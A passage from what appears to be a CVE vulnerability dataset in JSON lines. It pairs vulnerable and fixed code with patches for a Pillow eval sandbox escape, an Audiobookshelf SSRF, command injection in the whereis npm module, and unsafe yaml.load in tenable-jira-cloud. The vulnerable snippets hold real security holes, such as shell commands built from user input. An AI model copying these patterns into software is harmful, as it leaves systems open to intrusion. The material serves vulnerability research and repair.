\"\"\"\n\n # build execution namespace\n args = ops.copy()\n args.update(_dict)\n args.update(kw)\n for k, v in args.items():\n if hasattr(v, \"im\"):\n args[k] = _Operand(v)\n\n compiled_code = compile(expression, \"\", \"eval\")\n\n def scan(code):\n for const in code.co_consts:\n if type(const) is type(compiled_code):\n scan(const)\n\n for name in code.co_names:\n if name not in args and name != \"abs\":\n msg = f\"'{name}' not allowed\"\n raise ValueError(msg)\n\n scan(compiled_code)\n out = builtins.eval(expression, {\"__builtins\": {\"abs\": abs}}, args)\n try:\n return out.im\n except AttributeError:\n return out"}], "fix_func": [{"id": "fix_py_347_1", "commit": "45c726fd4daa63236a8f3653530f297dc87b160a", "file_path": "src/PIL/ImageMath.py", "start_line": 222, "end_line": 264, "snippet": "def eval(expression, _dict={}, **kw):\n \"\"\"\n Evaluates an image expression.\n\n :param expression: A string containing a Python-style expression.\n :param options: Values to add to the evaluation context. You\n can either use a dictionary, or one or more keyword\n arguments.\n :return: The evaluated expression. This is usually an image object, but can\n also be an integer, a floating point value, or a pixel tuple,\n depending on the expression.\n \"\"\"\n\n # build execution namespace\n args = ops.copy()\n args.update(_dict)\n args.update(kw)\n for k, v in args.items():\n if '__' in k or hasattr(__builtins__, k):\n msg = f\"'{k}' not allowed\"\n raise ValueError(msg)\n\n if hasattr(v, \"im\"):\n args[k] = _Operand(v)\n\n compiled_code = compile(expression, \"\", \"eval\")\n\n def scan(code):\n for const in code.co_consts:\n if type(const) is type(compiled_code):\n scan(const)\n\n for name in code.co_names:\n if name not in args and name != \"abs\":\n msg = f\"'{name}' not allowed\"\n raise ValueError(msg)\n\n scan(compiled_code)\n out = builtins.eval(expression, {\"__builtins\": {\"abs\": abs}}, args)\n try:\n return out.im\n except AttributeError:\n return out"}], "vul_patch": "--- a/src/PIL/ImageMath.py\n+++ b/src/PIL/ImageMath.py\n@@ -16,6 +16,10 @@\n args.update(_dict)\n args.update(kw)\n for k, v in args.items():\n+ if '__' in k or hasattr(__builtins__, k):\n+ msg = f\"'{k}' not allowed\"\n+ raise ValueError(msg)\n+\n if hasattr(v, \"im\"):\n args[k] = _Operand(v)\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-51665", "cve_description": "Audiobookshelf is a self-hosted audiobook and podcast server. Prior to 2.7.0, Audiobookshelf is vulnerable to unauthenticated blind server-side request (SSRF) vulnerability in Auth.js. This vulnerability has been addressed in version 2.7.0. There are no known workarounds for this vulnerability.\n\n", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/advplyr/audiobookshelf", "patch_url": ["https://github.com/advplyr/audiobookshelf/commit/728496010cbfcee5b7b54001c9f79e02ede30d82"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_241_1", "commit": "4336714", "file_path": "server/Auth.js", "start_line": 272, "end_line": 376, "snippet": " router.get('/auth/openid', (req, res, next) => {\n try {\n // helper function from openid-client\n function pick(object, ...paths) {\n const obj = {}\n for (const path of paths) {\n if (object[path] !== undefined) {\n obj[path] = object[path]\n }\n }\n return obj\n }\n\n // Get the OIDC client from the strategy\n // We need to call the client manually, because the strategy does not support forwarding the code challenge\n // for API or mobile clients\n const oidcStrategy = passport._strategy('openid-client')\n const protocol = (req.secure || req.get('x-forwarded-proto') === 'https') ? 'https' : 'http'\n\n let mobile_redirect_uri = null\n\n // The client wishes a different redirect_uri\n // We will allow if it is in the whitelist, by saving it into this.openIdAuthSession and setting the redirect uri to /auth/openid/mobile-redirect\n // where we will handle the redirect to it\n if (req.query.redirect_uri) {\n // Check if the redirect_uri is in the whitelist\n if (Database.serverSettings.authOpenIDMobileRedirectURIs.includes(req.query.redirect_uri) ||\n (Database.serverSettings.authOpenIDMobileRedirectURIs.length === 1 && Database.serverSettings.authOpenIDMobileRedirectURIs[0] === '*')) {\n oidcStrategy._params.redirect_uri = new URL(`${protocol}://${req.get('host')}/auth/openid/mobile-redirect`).toString()\n mobile_redirect_uri = req.query.redirect_uri\n } else {\n Logger.debug(`[Auth] Invalid redirect_uri=${req.query.redirect_uri} - not in whitelist`)\n return res.status(400).send('Invalid redirect_uri')\n }\n } else {\n oidcStrategy._params.redirect_uri = new URL(`${protocol}://${req.get('host')}/auth/openid/callback`).toString()\n }\n\n Logger.debug(`[Auth] Oidc redirect_uri=${oidcStrategy._params.redirect_uri}`)\n const client = oidcStrategy._client\n const sessionKey = oidcStrategy._key\n\n let code_challenge\n let code_challenge_method\n\n // If code_challenge is provided, expect that code_verifier will be handled by the client (mobile app)\n // The web frontend of ABS does not need to do a PKCE itself, because it never handles the \"code\" of the oauth flow\n // and as such will not send a code challenge, we will generate then one\n if (req.query.code_challenge) {\n code_challenge = req.query.code_challenge\n code_challenge_method = req.query.code_challenge_method || 'S256'\n\n if (!['S256', 'plain'].includes(code_challenge_method)) {\n return res.status(400).send('Invalid code_challenge_method')\n }\n } else {\n // If no code_challenge is provided, assume a web application flow and generate one\n const code_verifier = OpenIDClient.generators.codeVerifier()\n code_challenge = OpenIDClient.generators.codeChallenge(code_verifier)\n code_challenge_method = 'S256'\n\n // Store the code_verifier in the session for later use in the token exchange\n req.session[sessionKey] = { ...req.session[sessionKey], code_verifier }\n }\n\n const params = {\n state: OpenIDClient.generators.random(),\n // Other params by the passport strategy\n ...oidcStrategy._params\n }\n\n if (!params.nonce && params.response_type.includes('id_token')) {\n params.nonce = OpenIDClient.generators.random()\n }\n\n req.session[sessionKey] = {\n ...req.session[sessionKey],\n ...pick(params, 'nonce', 'state', 'max_age', 'response_type'),\n mobile: req.query.redirect_uri, // Used in the abs callback later, set mobile if redirect_uri is filled out\n sso_redirect_uri: oidcStrategy._params.redirect_uri // Save the redirect_uri (for the SSO Provider) for the callback\n }\n\n // We cannot save redirect_uri in the session, because it the mobile client uses browser instead of the API\n // for the request to mobile-redirect and as such the session is not shared\n this.openIdAuthSession.set(params.state, { mobile_redirect_uri: mobile_redirect_uri })\n\n // Now get the URL to direct to\n const authorizationUrl = client.authorizationUrl({\n ...params,\n scope: 'openid profile email',\n response_type: 'code',\n code_challenge,\n code_challenge_method\n })\n\n // params (isRest, callback) to a cookie that will be send to the client\n this.paramsToCookies(req, res)\n\n // Redirect the user agent (browser) to the authorization URL\n res.redirect(authorizationUrl)\n } catch (error) {\n Logger.error(`[Auth] Error in /auth/openid route: ${error}`)\n res.status(500).send('Internal Server Error')\n }\n })"}, {"id": "vul_js_241_2", "commit": "4336714", "file_path": "server/Auth.js", "start_line": 474, "end_line": 495, "snippet": " router.get('/auth/openid/config', async (req, res) => {\n if (!req.query.issuer) {\n return res.status(400).send('Invalid request. Query param \\'issuer\\' is required')\n }\n let issuerUrl = req.query.issuer\n if (issuerUrl.endsWith('/')) issuerUrl = issuerUrl.slice(0, -1)\n\n const configUrl = `${issuerUrl}/.well-known/openid-configuration`\n axios.get(configUrl).then(({ data }) => {\n res.json({\n issuer: data.issuer,\n authorization_endpoint: data.authorization_endpoint,\n token_endpoint: data.token_endpoint,\n userinfo_endpoint: data.userinfo_endpoint,\n end_session_endpoint: data.end_session_endpoint,\n jwks_uri: data.jwks_uri\n })\n }).catch((error) => {\n Logger.error(`[Auth] Failed to get openid configuration at \"${configUrl}\"`, error)\n res.status(error.statusCode || 400).send(`${error.code || 'UNKNOWN'}: Failed to get openid configuration`)\n })\n })"}], "fix_func": [{"id": "fix_js_241_1", "commit": "728496010cbfcee5b7b54001c9f79e02ede30d82", "file_path": "server/Auth.js", "start_line": 272, "end_line": 376, "snippet": " router.get('/auth/openid', (req, res, next) => {\n try {\n // helper function from openid-client\n function pick(object, ...paths) {\n const obj = {}\n for (const path of paths) {\n if (object[path] !== undefined) {\n obj[path] = object[path]\n }\n }\n return obj\n }\n\n // Get the OIDC client from the strategy\n // We need to call the client manually, because the strategy does not support forwarding the code challenge\n // for API or mobile clients\n const oidcStrategy = passport._strategy('openid-client')\n const protocol = (req.secure || req.get('x-forwarded-proto') === 'https') ? 'https' : 'http'\n\n let mobile_redirect_uri = null\n\n // The client wishes a different redirect_uri\n // We will allow if it is in the whitelist, by saving it into this.openIdAuthSession and setting the redirect uri to /auth/openid/mobile-redirect\n // where we will handle the redirect to it\n if (req.query.redirect_uri) {\n // Check if the redirect_uri is in the whitelist\n if (Database.serverSettings.authOpenIDMobileRedirectURIs.includes(req.query.redirect_uri) ||\n (Database.serverSettings.authOpenIDMobileRedirectURIs.length === 1 && Database.serverSettings.authOpenIDMobileRedirectURIs[0] === '*')) {\n oidcStrategy._params.redirect_uri = new URL(`${protocol}://${req.get('host')}/auth/openid/mobile-redirect`).toString()\n mobile_redirect_uri = req.query.redirect_uri\n } else {\n Logger.debug(`[Auth] Invalid redirect_uri=${req.query.redirect_uri} - not in whitelist`)\n return res.status(400).send('Invalid redirect_uri')\n }\n } else {\n oidcStrategy._params.redirect_uri = new URL(`${protocol}://${req.get('host')}/auth/openid/callback`).toString()\n }\n\n Logger.debug(`[Auth] Oidc redirect_uri=${oidcStrategy._params.redirect_uri}`)\n const client = oidcStrategy._client\n const sessionKey = oidcStrategy._key\n\n let code_challenge\n let code_challenge_method\n\n // If code_challenge is provided, expect that code_verifier will be handled by the client (mobile app)\n // The web frontend of ABS does not need to do a PKCE itself, because it never handles the \"code\" of the oauth flow\n // and as such will not send a code challenge, we will generate then one\n if (req.query.code_challenge) {\n code_challenge = req.query.code_challenge\n code_challenge_method = req.query.code_challenge_method || 'S256'\n\n if (!['S256', 'plain'].includes(code_challenge_method)) {\n return res.status(400).send('Invalid code_challenge_method')\n }\n } else {\n // If no code_challenge is provided, assume a web application flow and generate one\n const code_verifier = OpenIDClient.generators.codeVerifier()\n code_challenge = OpenIDClient.generators.codeChallenge(code_verifier)\n code_challenge_method = 'S256'\n\n // Store the code_verifier in the session for later use in the token exchange\n req.session[sessionKey] = { ...req.session[sessionKey], code_verifier }\n }\n\n const params = {\n state: OpenIDClient.generators.random(),\n // Other params by the passport strategy\n ...oidcStrategy._params\n }\n\n if (!params.nonce && params.response_type.includes('id_token')) {\n params.nonce = OpenIDClient.generators.random()\n }\n\n req.session[sessionKey] = {\n ...req.session[sessionKey],\n ...pick(params, 'nonce', 'state', 'max_age', 'response_type'),\n mobile: req.query.redirect_uri, // Used in the abs callback later, set mobile if redirect_uri is filled out\n sso_redirect_uri: oidcStrategy._params.redirect_uri // Save the redirect_uri (for the SSO Provider) for the callback\n }\n\n // We cannot save redirect_uri in the session, because it the mobile client uses browser instead of the API\n // for the request to mobile-redirect and as such the session is not shared\n this.openIdAuthSession.set(params.state, { mobile_redirect_uri: mobile_redirect_uri })\n\n // Now get the URL to direct to\n const authorizationUrl = client.authorizationUrl({\n ...params,\n scope: 'openid profile email',\n response_type: 'code',\n code_challenge,\n code_challenge_method\n })\n\n // params (isRest, callback) to a cookie that will be send to the client\n this.paramsToCookies(req, res)\n\n // Redirect the user agent (browser) to the authorization URL\n res.redirect(authorizationUrl)\n } catch (error) {\n Logger.error(`[Auth] Error in /auth/openid route: ${error}`)\n res.status(500).send('Internal Server Error')\n }\n })"}, {"id": "fix_js_241_2", "commit": "728496010cbfcee5b7b54001c9f79e02ede30d82", "file_path": "server/Auth.js", "start_line": 477, "end_line": 516, "snippet": " router.get('/auth/openid/config', this.isAuthenticated, async (req, res) => {\n if (!req.user.isAdminOrUp) {\n Logger.error(`[Auth] Non-admin user \"${req.user.username}\" attempted to get issuer config`)\n return res.sendStatus(403)\n }\n\n if (!req.query.issuer) {\n return res.status(400).send('Invalid request. Query param \\'issuer\\' is required')\n }\n\n // Strip trailing slash\n let issuerUrl = req.query.issuer\n if (issuerUrl.endsWith('/')) issuerUrl = issuerUrl.slice(0, -1)\n\n // Append config pathname and validate URL\n let configUrl = null\n try {\n configUrl = new URL(`${issuerUrl}/.well-known/openid-configuration`)\n if (!configUrl.pathname.endsWith('/.well-known/openid-configuration')) {\n throw new Error('Invalid pathname')\n }\n } catch (error) {\n Logger.error(`[Auth] Failed to get openid configuration. Invalid URL \"${configUrl}\"`, error)\n return res.status(400).send('Invalid request. Query param \\'issuer\\' is invalid')\n }\n\n axios.get(configUrl.toString()).then(({ data }) => {\n res.json({\n issuer: data.issuer,\n authorization_endpoint: data.authorization_endpoint,\n token_endpoint: data.token_endpoint,\n userinfo_endpoint: data.userinfo_endpoint,\n end_session_endpoint: data.end_session_endpoint,\n jwks_uri: data.jwks_uri\n })\n }).catch((error) => {\n Logger.error(`[Auth] Failed to get openid configuration at \"${configUrl}\"`, error)\n res.status(error.statusCode || 400).send(`${error.code || 'UNKNOWN'}: Failed to get openid configuration`)\n })\n })"}], "vul_patch": "--- a/server/Auth.js\n+++ b/server/Auth.js\n@@ -25,7 +25,7 @@\n if (req.query.redirect_uri) {\n // Check if the redirect_uri is in the whitelist\n if (Database.serverSettings.authOpenIDMobileRedirectURIs.includes(req.query.redirect_uri) ||\n- (Database.serverSettings.authOpenIDMobileRedirectURIs.length === 1 && Database.serverSettings.authOpenIDMobileRedirectURIs[0] === '*')) {\n+ (Database.serverSettings.authOpenIDMobileRedirectURIs.length === 1 && Database.serverSettings.authOpenIDMobileRedirectURIs[0] === '*')) {\n oidcStrategy._params.redirect_uri = new URL(`${protocol}://${req.get('host')}/auth/openid/mobile-redirect`).toString()\n mobile_redirect_uri = req.query.redirect_uri\n } else {\n\n--- a/server/Auth.js\n+++ b/server/Auth.js\n@@ -1,12 +1,30 @@\n- router.get('/auth/openid/config', async (req, res) => {\n+ router.get('/auth/openid/config', this.isAuthenticated, async (req, res) => {\n+ if (!req.user.isAdminOrUp) {\n+ Logger.error(`[Auth] Non-admin user \"${req.user.username}\" attempted to get issuer config`)\n+ return res.sendStatus(403)\n+ }\n+\n if (!req.query.issuer) {\n return res.status(400).send('Invalid request. Query param \\'issuer\\' is required')\n }\n+\n+ // Strip trailing slash\n let issuerUrl = req.query.issuer\n if (issuerUrl.endsWith('/')) issuerUrl = issuerUrl.slice(0, -1)\n \n- const configUrl = `${issuerUrl}/.well-known/openid-configuration`\n- axios.get(configUrl).then(({ data }) => {\n+ // Append config pathname and validate URL\n+ let configUrl = null\n+ try {\n+ configUrl = new URL(`${issuerUrl}/.well-known/openid-configuration`)\n+ if (!configUrl.pathname.endsWith('/.well-known/openid-configuration')) {\n+ throw new Error('Invalid pathname')\n+ }\n+ } catch (error) {\n+ Logger.error(`[Auth] Failed to get openid configuration. Invalid URL \"${configUrl}\"`, error)\n+ return res.status(400).send('Invalid request. Query param \\'issuer\\' is invalid')\n+ }\n+\n+ axios.get(configUrl.toString()).then(({ data }) => {\n res.json({\n issuer: data.issuer,\n authorization_endpoint: data.authorization_endpoint,\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-3772", "cve_description": "Concatenating unsanitized user input in the `whereis` npm module < 0.4.1 allowed an attacker to execute arbitrary commands. The `whereis` module is deprecated and it is recommended to use the `which` npm module instead.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/vvo/node-whereis", "patch_url": ["https://github.com/vvo/node-whereis/commit/0f64e3780235004fb6e43bfd153ea3e0e210ee2b"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_17_1", "commit": "b8b642b", "file_path": "index.js", "start_line": 3, "end_line": 31, "snippet": "module.exports = function whereis(name, cb) {\n cp.exec('which ' + name, function(error, stdout, stderr) {\n stdout = stdout.split('\\n')[0];\n if (error || stderr || stdout === '' || stdout.charAt(0) !== '/') {\n stdout = stdout.split('\\n')[0];\n cp.exec('whereis ' + name, function(error, stdout, stderr) {\n if (error || stderr || stdout === '' || stdout.indexOf( '/' ) === -1) {\n cp.exec('where ' + name, function (error, stdout, stderr) { //windows\n if (error || stderr || stdout === '' || stdout.indexOf('\\\\') === -1) {\n cp.exec('for %i in (' + name + '.exe) do @echo. %~$PATH:i', function (error, stdout, stderr) { //windows xp\n if (error || stderr || stdout === '' || stdout.indexOf('\\\\') === -1) {\n return cb(new Error('Could not find ' + name + ' on your system'));\n }\n return cb(null, stdout);\n });\n } else {\n return cb(null, stdout);\n }\n });\n }\n else {\n return cb(null, stdout.split(' ')[1]);\n }\n });\n } else {\n return cb(null, stdout);\n }\n });\n};"}], "fix_func": [{"id": "fix_js_17_1", "commit": "0f64e37", "file_path": "index.js", "start_line": 3, "end_line": 31, "snippet": "module.exports = function whereis(name, cb) {\n cp.execFile('which', [name], function(error, stdout, stderr) {\n stdout = stdout.split('\\n')[0];\n if (error || stderr || stdout === '' || stdout.charAt(0) !== '/') {\n stdout = stdout.split('\\n')[0];\n cp.execFile('whereis', [name], function(error, stdout, stderr) {\n if (error || stderr || stdout === '' || stdout.indexOf( '/' ) === -1) {\n cp.execFile('where', [name], function (error, stdout, stderr) { //windows\n if (error || stderr || stdout === '' || stdout.indexOf('\\\\') === -1) {\n cp.exec('for %i in (' + name + '.exe) do @echo. %~$PATH:i', function (error, stdout, stderr) { //windows xp\n if (error || stderr || stdout === '' || stdout.indexOf('\\\\') === -1) {\n return cb(new Error('Could not find ' + name + ' on your system'));\n }\n return cb(null, stdout);\n });\n } else {\n return cb(null, stdout);\n }\n });\n }\n else {\n return cb(null, stdout.split(' ')[1]);\n }\n });\n } else {\n return cb(null, stdout);\n }\n });\n};"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -1,11 +1,11 @@\n module.exports = function whereis(name, cb) {\n- cp.exec('which ' + name, function(error, stdout, stderr) {\n+ cp.execFile('which', [name], function(error, stdout, stderr) {\n stdout = stdout.split('\\n')[0];\n if (error || stderr || stdout === '' || stdout.charAt(0) !== '/') {\n stdout = stdout.split('\\n')[0];\n- cp.exec('whereis ' + name, function(error, stdout, stderr) {\n+ cp.execFile('whereis', [name], function(error, stdout, stderr) {\n if (error || stderr || stdout === '' || stdout.indexOf( '/' ) === -1) {\n- cp.exec('where ' + name, function (error, stdout, stderr) { //windows\n+ cp.execFile('where', [name], function (error, stdout, stderr) { //windows\n if (error || stderr || stdout === '' || stdout.indexOf('\\\\') === -1) {\n cp.exec('for %i in (' + name + '.exe) do @echo. %~$PATH:i', function (error, stdout, stderr) { //windows xp\n if (error || stderr || stdout === '' || stdout.indexOf('\\\\') === -1) {\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2018-3772:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/node-whereis\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\njest ./poc\n", "unit_test_cmd": null} {"cve_id": "CVE-2021-21371", "cve_description": "Tenable for Jira Cloud is an open source project designed to pull Tenable.io vulnerability data, then generate Jira Tasks and sub-tasks based on the vulnerabilities' current state. It published in pypi as \"tenable-jira-cloud\". In tenable-jira-cloud before version 1.1.21, it is possible to run arbitrary commands through the yaml.load() method. This could allow an attacker with local access to the host to run arbitrary code by running the application with a specially crafted YAML configuration file. This is fixed in version 1.1.21 by using yaml.safe_load() instead of yaml.load().", "cwe_info": {"CWE-502": {"name": "Deserialization of Untrusted Data", "description": "The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid."}}, "repo": "https://github.com/tenable/integration-jira-cloud", "patch_url": ["https://github.com/tenable/integration-jira-cloud/commit/f8c2095fd529e664e7fa25403a0a4a85bb3907d0"], "programing_language": "Python", "vul_func": [{"id": "vul_py_77_1", "commit": "fa838db", "file_path": "tenable_jira/cli.py", "start_line": "59", "end_line": "231", "snippet": "def cli(configfile, observed_since, setup_only=False, troubleshoot=False):\n '''\n Tenable.io -> Jira Cloud Transformer & Ingester\n '''\n # Load the config, but ensure that any additional fields are additive to the\n # basic field set.\n config_from_file = yaml.load(configfile, Loader=yaml.Loader)\n fields = config_from_file.pop('custom_fields', list())\n config = dict_merge(base_config(), config_from_file)\n config['fields'] = config['fields'] + fields\n\n if config['tenable'].get('tio_transform_tags'):\n attr_cache = config['tenable'].get('tio_asset_attr_cache', list())\n tag_attrs = config['tenable'].get('tio_transform_tags', list())\n config['tenable']['tio_asset_attr_cache'] = attr_cache + tag_attrs\n\n\n # Get the logging definition and define any defaults as need be.\n log = config.get('log', {})\n log_lvls = {'debug': 10, 'info': 20, 'warn': 30, 'error': 40}\n log['level'] = log_lvls[log.get('level', 'warn')]\n log['format'] = log.get('format',\n '%(asctime)-15s %(name)s %(levelname)s %(message)s')\n\n # Configure the root logging facility\n if troubleshoot:\n logging.basicConfig(\n level=logging.DEBUG,\n format=log['format'],\n filename='tenable_debug.log'\n )\n else:\n logging.basicConfig(**log)\n\n # Output some basic information detailing the config file used and the\n # python version & system arch.\n logging.info('Tenable2JiraCloud Version {}'.format(__version__))\n logging.info('Using configuration file {}'.format(configfile.name))\n uname = platform.uname()\n logging.info('Running on Python {} {}/{}'.format(\n '.'.join([str(i) for i in sys.version_info][0:3]),\n uname[0], uname[-2]))\n\n # instantiate the Jira object\n jira = Jira(\n 'https://{}/rest/api/3'.format(config['jira']['address']),\n config['jira']['api_username'],\n config['jira']['api_token']\n )\n\n # Initiate the Tenable.io API model, the Ingester model, and start the\n # ingestion and data transformation.\n if config['tenable'].get('platform') == 'tenable.io':\n if not observed_since:\n # if no since field is supplied, then look in the config file to see\n # if an age was applied, if not, then use the default of 30 days.\n observed_since = arrow.now()\\\n .shift(days=-config['tenable'].get('tio_age', 30))\\\n .floor('day').timestamp()\n\n source = TenableIO(\n access_key=config['tenable'].get('access_key'),\n secret_key=config['tenable'].get('secret_key'),\n vendor='Tenable',\n product='JiraCloud',\n build=__version__\n )\n if int(source.session.details().get('permissions')) < 64:\n logging.error('API Keys tie to non-admin user.')\n elif config['tenable'].get('platform') == 'tenable.sc':\n source = TenableSC(\n config['tenable'].get('address'),\n port=int(config['tenable'].get('port', 443)),\n username=config['tenable'].get('username'),\n password=config['tenable'].get('password'),\n access_key=config['tenable'].get('access_key'),\n secret_key=config['tenable'].get('secret_key'),\n vendor='Tenable',\n product='JiraCloud',\n build=__version__\n )\n else:\n logging.error('No valid Tenable platform configuration defined.')\n exit(1)\n ingest = Tio2Jira(source, jira, config)\n\n if troubleshoot:\n # if the troubleshooting flag is set, then we will be collecting some\n # basic information and outputting it to the screen in a format that\n # Github issues would expect to format it all pretty. This should help\n # reduce the amount of time that is spent with back-and-forth debugging.\n try:\n ingest.ingest(int(observed_since))\n except:\n logging.exception('Caught the following Exception')\n\n # Some basic redaction of sensitive data, such as API Keys, Usernames,\n # Passwords, and hostnames.\n addr = config_from_file['jira']['address']\n sc_addr = 'NOTHING_TO_SEE_HERE_AT_ALL'\n config_from_file['jira']['address'] = ''\n config_from_file['jira']['api_token'] = ''\n config_from_file['jira']['api_username'] = ''\n config_from_file['project']['leadAccountId'] = ''\n if config_from_file['tenable'].get('address'):\n sc_addr = config_from_file['tenable']['address']\n config_from_file['tenable']['address'] = ''\n if config_from_file['tenable'].get('access_key'):\n config_from_file['tenable']['access_key'] = ''\n if config_from_file['tenable'].get('secret_key'):\n config_from_file['tenable']['secret_key'] = ''\n if config_from_file['tenable'].get('username'):\n config_from_file['tenable']['username'] = ''\n if config_from_file['tenable'].get('password'):\n config_from_file['tenable']['password'] = ''\n\n output = troubleshooting.format(\n configfile=yaml.dump(config_from_file, default_flow_style=False),\n logging=open('tenable_debug.log').read() \\\n .replace(addr, '') \\\n .replace(sc_addr, ''),\n issuetypes='\\n'.join(\n [\n '{id}: {name}'.format(**a)\n for a in jira.issue_types.list()\n if a.get('name').lower() in ['task', 'subtask', 'sub-task']\n ]\n )\n )\n print(output)\n print('\\n'.join([\n '/-------------------------------NOTICE-----------------------------------\\\\',\n '| The output above is helpful for us to troubleshoot exactly what is |',\n '| happening within the code and offer a diagnosis for how to correct. |',\n '| Please note that while some basic redaction has already been performed |',\n '| that we ask you to review the information you\\'re about to send and |',\n '| ensure that nothing deemed sensitive is transmitted. |',\n '| ---------------------------------------------------------------------- |',\n '| -- Copy of output saved to \"issue_debug.md\" |',\n '\\\\------------------------------------------------------------------------/'\n ]))\n with open('issue_debug.md', 'w') as reportfile:\n print(output, file=reportfile)\n os.remove('tenable_debug.log')\n elif not setup_only:\n ingest.ingest(observed_since)\n\n # If we are expected to continually re-run the transformer, then we will\n # need to track the passage of time and run every X hours, where X is\n # defined by the user in the configuration.\n if config.get('service', {}).get('interval', 0) > 0:\n sleeper = int(config['service']['interval']) * 3600\n while True:\n last_run = int(time.time())\n logging.info(\n 'Sleeping for {}h'.format(sleeper/3600))\n time.sleep(sleeper)\n logging.info(\n 'Initiating ingest with observed_since={}'.format(last_run))\n ingest.ingest(last_run)\n elif setup_only:\n # In setup-only mode, the ingest will not run, and instead a config file\n # will be generated that will have all of the JIRA identifiers baked in\n # and will also inform the integration to ignore the screen builder.\n # When using this config, if there are any changes to the code, then\n # this config will need to be re-generated.\n config['screen']['no_create'] = True\n logging.info('Set to setup-only. Will not run ingest.')\n logging.info('The following is the updated config file from the setup.')\n with open('generated_config.yaml', 'w') as outfile:\n outfile.write(yaml.dump(config, Dumper=yaml.Dumper))\n logging.info('Generated \"generated_config.yaml\" config file.')\n logging.info('This config file should be updated for every new version of this integration.')"}], "fix_func": [{"id": "fix_py_77_1", "commit": "f8c2095", "file_path": "tenable_jira/cli.py", "start_line": "59", "end_line": "231", "snippet": "def cli(configfile, observed_since, setup_only=False, troubleshoot=False):\n '''\n Tenable.io -> Jira Cloud Transformer & Ingester\n '''\n # Load the config, but ensure that any additional fields are additive to the\n # basic field set.\n config_from_file = yaml.safe_load(configfile)\n fields = config_from_file.pop('custom_fields', list())\n config = dict_merge(base_config(), config_from_file)\n config['fields'] = config['fields'] + fields\n\n if config['tenable'].get('tio_transform_tags'):\n attr_cache = config['tenable'].get('tio_asset_attr_cache', list())\n tag_attrs = config['tenable'].get('tio_transform_tags', list())\n config['tenable']['tio_asset_attr_cache'] = attr_cache + tag_attrs\n\n\n # Get the logging definition and define any defaults as need be.\n log = config.get('log', {})\n log_lvls = {'debug': 10, 'info': 20, 'warn': 30, 'error': 40}\n log['level'] = log_lvls[log.get('level', 'warn')]\n log['format'] = log.get('format',\n '%(asctime)-15s %(name)s %(levelname)s %(message)s')\n\n # Configure the root logging facility\n if troubleshoot:\n logging.basicConfig(\n level=logging.DEBUG,\n format=log['format'],\n filename='tenable_debug.log'\n )\n else:\n logging.basicConfig(**log)\n\n # Output some basic information detailing the config file used and the\n # python version & system arch.\n logging.info('Tenable2JiraCloud Version {}'.format(__version__))\n logging.info('Using configuration file {}'.format(configfile.name))\n uname = platform.uname()\n logging.info('Running on Python {} {}/{}'.format(\n '.'.join([str(i) for i in sys.version_info][0:3]),\n uname[0], uname[-2]))\n\n # instantiate the Jira object\n jira = Jira(\n 'https://{}/rest/api/3'.format(config['jira']['address']),\n config['jira']['api_username'],\n config['jira']['api_token']\n )\n\n # Initiate the Tenable.io API model, the Ingester model, and start the\n # ingestion and data transformation.\n if config['tenable'].get('platform') == 'tenable.io':\n if not observed_since:\n # if no since field is supplied, then look in the config file to see\n # if an age was applied, if not, then use the default of 30 days.\n observed_since = arrow.now()\\\n .shift(days=-config['tenable'].get('tio_age', 30))\\\n .floor('day').timestamp()\n\n source = TenableIO(\n access_key=config['tenable'].get('access_key'),\n secret_key=config['tenable'].get('secret_key'),\n vendor='Tenable',\n product='JiraCloud',\n build=__version__\n )\n if int(source.session.details().get('permissions')) < 64:\n logging.error('API Keys tie to non-admin user.')\n elif config['tenable'].get('platform') == 'tenable.sc':\n source = TenableSC(\n config['tenable'].get('address'),\n port=int(config['tenable'].get('port', 443)),\n username=config['tenable'].get('username'),\n password=config['tenable'].get('password'),\n access_key=config['tenable'].get('access_key'),\n secret_key=config['tenable'].get('secret_key'),\n vendor='Tenable',\n product='JiraCloud',\n build=__version__\n )\n else:\n logging.error('No valid Tenable platform configuration defined.')\n exit(1)\n ingest = Tio2Jira(source, jira, config)\n\n if troubleshoot:\n # if the troubleshooting flag is set, then we will be collecting some\n # basic information and outputting it to the screen in a format that\n # Github issues would expect to format it all pretty. This should help\n # reduce the amount of time that is spent with back-and-forth debugging.\n try:\n ingest.ingest(int(observed_since))\n except:\n logging.exception('Caught the following Exception')\n\n # Some basic redaction of sensitive data, such as API Keys, Usernames,\n # Passwords, and hostnames.\n addr = config_from_file['jira']['address']\n sc_addr = 'NOTHING_TO_SEE_HERE_AT_ALL'\n config_from_file['jira']['address'] = ''\n config_from_file['jira']['api_token'] = ''\n config_from_file['jira']['api_username'] = ''\n config_from_file['project']['leadAccountId'] = ''\n if config_from_file['tenable'].get('address'):\n sc_addr = config_from_file['tenable']['address']\n config_from_file['tenable']['address'] = ''\n if config_from_file['tenable'].get('access_key'):\n config_from_file['tenable']['access_key'] = ''\n if config_from_file['tenable'].get('secret_key'):\n config_from_file['tenable']['secret_key'] = ''\n if config_from_file['tenable'].get('username'):\n config_from_file['tenable']['username'] = ''\n if config_from_file['tenable'].get('password'):\n config_from_file['tenable']['password'] = ''\n\n output = troubleshooting.format(\n configfile=yaml.dump(config_from_file, default_flow_style=False),\n 